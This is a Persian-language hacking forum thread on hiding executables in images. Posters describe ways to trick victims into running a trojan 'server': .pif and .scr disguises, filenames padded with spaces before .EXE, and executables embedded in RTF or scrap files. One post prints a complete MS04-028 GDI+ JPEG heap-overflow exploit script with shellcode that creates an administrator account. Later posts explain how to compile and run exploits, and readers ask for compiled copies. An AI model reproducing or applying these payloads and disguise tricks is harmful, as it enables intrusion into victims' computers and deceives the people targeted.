ايران ويج

نسخه‌ی کامل: چسباندن يك فايل اجرائي به عكس
شما در حال مشاهده‌ی نسخه‌ی متنی این صفحه می‌باشید. مشاهده‌ی نسخه‌ی کامل با قالب بندی مناسب.
صفحه‌ها: 1 2
koroshbozorg نوشته است:چسبادن فایل عکس برای نمونه به یک فایل اجرایی شدنی هست. ولی مشکل اینجاست که پسوند تغییر نمی کنه. پسوند jpg نیست و در واقع همون exe هست. راهی که بتونه این پسوند رو به دلخواه عوض کنه و کارایی فایل سرور هم از دست نره در نظر هست.

مرسي دقيقا منظور من همينه.نمي دونم راهي هست يا نه؟
مي تونيد از مهندسي اجتماعي استفاده كنيد.

من دوستي داشتم كه براي ارسال سرور ياكوزا از روش مهندسي اجتماعي به بهترين نحو ممكن استفاده مي كرد. اون فايل سرور رو با پسوند Pif روي وب قرار مي داد و لينك اون رو با عنوان پي دي اف آموزشي يا ... براي قرباني ارسال مي كرد.
يا در مواردي اون رو با پسوند SCR به عنوان اسكرين سيور ويژه ولنتاين جا مي زد. به اين ترتيب قرباني به سادگي فريب مي خورد .


يكي از روش هايي كه چند وقت پيش غوغا كرده بود تغيير نام فايل به Server.Jpg. { 50 Space }.EXE و ارسال اون براي قرباني بود. با اين روش پسوند فايل به نظر چيز ديگري مي آمد اما امروزه ديگر نمي توان به سادگي از اين روش استفاده كرد.

يه روش ديگه براي پنهان كردن سرور ، قرار دادن اون در فايل هاي Rtf يا همون فايلهاي WordPad‌ويندوز هست. براي اين كار كافيه وردپد ويندوز رو اجرا كنيد و فايل خودتون روداخلش درگ كنيد. ملاحظه مي كنيد كه فايل سرور به صورت پكيجي داخل اون قرار مي گيره كه با كليك بر روي اون سرور اجرا خواهد شد. شما حتي مي تونيد اسم و آيكون پكيج رو هم تغيير بديد.

راه ديگه اي كه مي شه از اون استفاده كرد ساخت فايل Scrap هست. فايل هاي اسكراپ در ويندوز بدون پسوند نمايش داده مي شوند و مي تونن گزينه مناسبي براي حمل سرور باشن چون بالاخره پسوند نداشتن بهتر از پسوند اجرايي داشتنه (‌البته اشتباه نشه پسوند دارن ولي نمايش داده نمي شه )
براي ساخت اسكراپ بايد همون كارهاي قبل رو انجام بديد ولي در نهايت بايد پكيج رو كژي كنيد و داخل فولدر ذخيره كنيد.

همه اين راه ها رو گفتم اما خداوكيليش اين رفيق ما دو كلاس سواد برنامه نويسي هم نداره ولي با مهندسي اجتماعي اونقدر راحت به سيستم ها نفوذ مي كنه كه آدم حسوديش مي شه!! Tongue Wink
lord_viper نوشته است:
shahram_g نوشته است:
sima_6600 نوشته است:نميشه فايل اجراي رو به عكس چسباند ولي ميتوان عكس را به فايل اجراي چسباند.مثل Binder ها ولي اگر شما مي خواهيد فايل با پسوند Jpg باشد مي توانيد از باگ قديمي اين پسوند استفاده كنيد و يه فايل رو توي سايتي Upload كني و آدرسش رو داخل اون بدي و فايل رو بسازي و براي طرف بفرستي.ولي اين كار به طور مستقيم ويروس را وارد كامپيوتر طرف نميكنه و بايد طرف به اينترنت وصل باشه.

ببخشيد ميشه بيشتر توضيح بدي؟
ممنون
این مربوط میشه به بخش هک
تو فایل با فورمت jpg یه باگ هست که هکر با استفاده از اون میتونه یه کد مخرب رونفایل jpg قرار بده و اون عکس رو بده به شما وقتی شما اون عکس رو باز میکنین کد مورد نظر که هر چیزی میتونه باشه (از باز کردن یک پورت روی سیستم تا ایجاد یک اکانت کاربری یا دسترسی ادمین)روی سیستم شما ایجاد میکنه تا هکر بتونه به سیستم شما نفوظ کنه

سلام.
میشه در مورد روش استفاده از این باگ توضیح بدی؟ اصلا هنوز این باگ موجود هست ؟ یا پچش اومده؟
سلام پیمان جان
اين كسپلويت به هکر اجازه می ده کدهای مخرب خود را درون فایل های JPEG که همان فرمت عکس هست قرار بده و برای قربانی های خود ارسال کنند. به محض باز کردن فایل JPEG فرستاده شده از سوی هکر، در سیستم قربانی کد مخربی اجرا می شه که بسته به معلومات هکر می تونه پورتی را بر روی سیستم قربانی باز کرده و Shell سیستم قربانی را به هکر بده و یا Account ای با سطح اختیارات Admin در آن سیستم بسازه و یا باعث Crash کردن یک سیستم بشه و کارهای دیگر.
اين اكسپلويت چند تا ورژن داره اين يكي فكر مي كنم يه يوزر در سطح ادمين ميده
کد:
// CAN-2004-0200

#!/bin/sh
#
# MS04-028 Exploit PoC II with Shellcode: CreateUser X in Administrators Group
#
# Tested on:
# WinXP Professional English SP1 - GDIPLUS.DLL version 5.1.3097.0
# WinXP Professional Italian SP1 - GDIPLUS.DLL version 5.1.3101.0
# (SP2 is not vulnerable, don't waste your time trying this exploit on it!)
#
# Usage:
#    first,  replace the "\xCC" = INT3 instruction at beginning of shellcode
#    second, choose a right ret address for GDI+ DLL and WinXP version
#    then,  create crafted JPEG with: sh ms04-028.sh > img.jpg
#
# Created by:
#    Elia Florio
#    (heap overflow study purpose, not for lamerz, not for script-kiddie)
#
# Thanx to:
# jerome.athias
# metasploit.org
# idefense
# full-disclosure list

#********************************************
#Standard JPEG header
#********************************************
printf "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64\x00\x60\x00\x00"
printf "\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00\x04\x00\x00\x00\x0A\x00\x00"
printf "\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65\x00\x64\xC0\x00\x00\x00\x01"

#********************************************
#Heap Overflow Trigger DWORD - 00 length field (01 works too)
#********************************************
printf "\xFF\xFE\x00\x01"


#********************************************
#Additional stuff to complete the header
#********************************************
printf  "\x00\x14\x10\x10\x19\x12\x19\x27\x17\x17\x27\x32"


#********************************************
#Sugg. by jerome.athias
# 1) Opening directly in IE
#Address to overwrite = RtlEnterCriticalSelection() - 4
#Check page 172 of SC Handbook for those of you playing along at home
#********************************************
printf "\xEB\x0F\x26\x32" #control ECX register


#********************************************
#Address of shellcode
#********************************************
printf "\x42\x42\x42\x42" #control EDX, left these values if u wanna raise an exception and debug in GDI+
#printf "\xDC\xB1\xE7\x70" #70E7B1DC WinXP Professional English SP1 -GDIPLUS.DLL version 5.1.3097.0
#printf "\xDC\xB1\x30\x78" #7830B1DC WinXP Professional Italian SP1 -GDIPLUS.DLL version 5.1.3101.0


#********************************************
#end_of_jpeg_header
#********************************************
printf "\x26\x2E\x3E\x35\x35\x35\x35\x35\x3E"
#NOP1
printf "\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
printf "\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8"

#********************************************
#Image junk here...fake JPG
#********************************************
printf
"\x00\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07";
printf
"\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B\x0C\x19\x12\x13\x0F\x14";
printf
"\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20\x24\x2E\x27\x20\x22\x2C\x23\x1C";
printf
"\x1C\x28\x37\x29\x2C\x30\x31\x34\x34\x34\x1F\x27\x39\x3D\x38\x32\x3C";
printf
"\x2E\x33\x34\x32\xFF\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18\x0D";
printf
"\x0D\x18\x32\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf
"\x32\x32\x32\x32\x32\xFF\xC0\x00\x11\x08\x00\x03\x00\x03\x03\x01\x22";
printf
"\x00\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01\x01";
printf
"\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05";
printf
"\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00\x02\x01\x03\x03\x02";
printf
"\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D\x01\x02\x03\x00\x04\x11\x05";
printf
"\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xA1\x08";
printf
"\x23\x42\xB1\xC1\x15\x52\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17";
printf
"\x18\x19\x1A\x25\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43";
printf
"\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64";
printf
"\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83\x84\x85";
printf
"\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4";
printf
"\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3";
printf
"\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE1";
printf
"\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8";
printf
"\xF9\xFA\xFF\xC4\x00\x1F\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01";
printf
"\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A";
printf
"\x0B\xFF\xC4\x00\xB5\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04";
printf
"\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31\x06\x12\x41";
printf
"\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xA1\xB1\xC1\x09\x23";
printf
"\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24\x34\xE1\x25\xF1\x17\x18\x19";
printf
"\x1A\x26\x27\x28\x29\x2A\x35\x36\x37\x38\x39\x3A\x43\x44\x45\x46\x47";
printf
"\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64\x65\x66\x67\x68";
printf
"\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x82\x83\x84\x85\x86\x87\x88";
printf
"\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7";
printf
"\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3\xC4\xC5\xC6";
printf
"\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE2\xE3\xE4\xE5";
printf
"\xE6\xE7\xE8\xE9\xEA\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xDA\x00";
printf
"\x0C\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00\xF9\xFE\x8A\x28\xA0\x0F";

#********************************************
#"A" buffer
#********************************************
perl -e 'print "\x41"x1601'; #buffer 1601 x NOP

#********************************************
#SHELLCODE AREA
#place shellcode here...
#don't use any "FFD9" bytes, cause it is the marker for end of jpeg image
#********************************************
printf "\xCC\x90\x90\x90"; #replace "CC=INT3" byte with NOP to make it
works!

#********************************************
#shellcode: CreateUserX as Administrator (provided by Metasploit, thanx for
your Framework, is great!)
#********************************************
printf "\x66\x81\xec\x80\x00\x89\xe6\xe8\xb7\x00\x00\x00\x89\x06\x89\xc3"
printf "\x53\x68\x7e\xd8\xe2\x73\xe8\xbd\x00\x00\x00\x89\x46\x0c\x53\x68"
printf "\x8e\x4e\x0e\xec\xe8\xaf\x00\x00\x00\x89\x46\x08\x31\xdb\x53\x68"
printf "\x70\x69\x33\x32\x68\x6e\x65\x74\x61\x54\xff\xd0\x89\x46\x04\x89"
printf "\xc3\x53\x68\x5e\xdf\x7c\xcd\xe8\x8c\x00\x00\x00\x89\x46\x10\x53"
printf "\x68\xd7\x3d\x0c\xc3\xe8\x7e\x00\x00\x00\x89\x46\x14\x31\xc0\x31"
printf "\xdb\x43\x50\x68\x72\x00\x73\x00\x68\x74\x00\x6f\x00\x68\x72\x00"
printf "\x61\x00\x68\x73\x00\x74\x00\x68\x6e\x00\x69\x00\x68\x6d\x00\x69"
printf "\x00\x68\x41\x00\x64\x00\x89\x66\x1c\x50\x68\x58\x00\x00\x00\x89"
printf "\xe1\x89\x4e\x18\x68\x00\x00\x5c\x00\x50\x53\x50\x50\x53\x50\x51"
printf "\x51\x89\xe1\x50\x54\x51\x53\x50\xff\x56\x10\x8b\x4e\x18\x49\x49"
printf "\x51\x89\xe1\x6a\x01\x51\x6a\x03\xff\x76\x1c\x6a\x00\xff\x56\x14"
printf "\xff\x56\x0c\x56\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
printf "\xad\x8b\x40\x08\x5e\xc2\x04\x00\x53\x55\x56\x57\x8b\x6c\x24\x18"
printf "\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01"
printf "\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38"
printf "\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1"
printf "\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04"
printf "\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00";

#********************************************
#end_of_jpeg
#********************************************
printf "\xFF\xD9";
سلام.
ممنونم ازت. میشه روش کامپایل این اکسپلویت و قرار دادن اون تو یه عکس رو هم توضیح بدی. تو گوگل سرچ کردم چیزی پیدا نکردم.
سلام.
چی شد پس؟
سلام پیمان جان شرمنده تاپیکو گم کرده بودم الانم vbgod ادرس داد
این اکسپلوییت یه کم قدیمی شده انتی ها هم بهش گیر میده
برای کامپایل کردن اکسپلویت های C در ویندوز می تونید از ++Visual C و Lccwin و ++Borland C استفاده کنید (برنامه پيشنهادي من)
بعد از كامپايل اكسپلويت بايد اونو اجرا کنيد . و شما نمی تونيد اونو با کليک کردن اجرا کنيد چون باز نميشه برای اينکار بايد اکسپلويت کامپايل شده را در دايرکتوری ويندوزتون در يك پوشه اي کپی کنيد . و بعد به منوی استار رفته و روی گزينه Run کليک کنيد و سپس تايپ کنيد : cmd حالا command prompt باز شده حالا بايد اسم اکسپيويتتون رو تايپ کنيداکسپلويت هم نحوه کار رو داخل همون داس ويندوز توضيح می ده که اگه يه کم زبان بلد باشين می فهميد
سلام .
اگه كسي كامپايلش كرد بذاره ما هم دانلود كنيم .واسه ور‍‍ژن جديداش بايد چيكار كنيم ؟
صفحه‌ها: 1 2